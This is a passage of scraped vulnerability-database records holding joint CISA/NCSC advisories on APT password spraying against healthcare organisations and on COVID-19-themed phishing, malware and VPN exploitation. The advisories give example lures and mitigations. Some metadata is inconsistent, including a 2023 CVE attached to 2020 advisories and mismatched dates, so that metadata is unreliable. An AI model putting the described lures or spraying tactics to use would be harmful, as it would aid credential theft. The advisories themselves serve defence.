Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:12:32", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy, or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations. **See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability **so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information: **Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:12:51", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note: **this is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19- themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware. \n * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware. \n * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency)\u201d\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note: **a non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n\n\n##### Figure 1: UK government-themed SMS phishing\n\n\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \"EMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\" malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \"TrickBot\" malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as Trickbot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [A20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Futures\u2019 report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com\\\\r\\\\blueteamsec\\\\comments\\\\fiy0i8\\\\master_thread_covid19corona_threat_actor_campaigns\\\\>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority **\u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency **\u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion **\u2013 Does the message make you panic, fearful, hopeful, or curious? Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity **\u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014 for online meetings. In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products 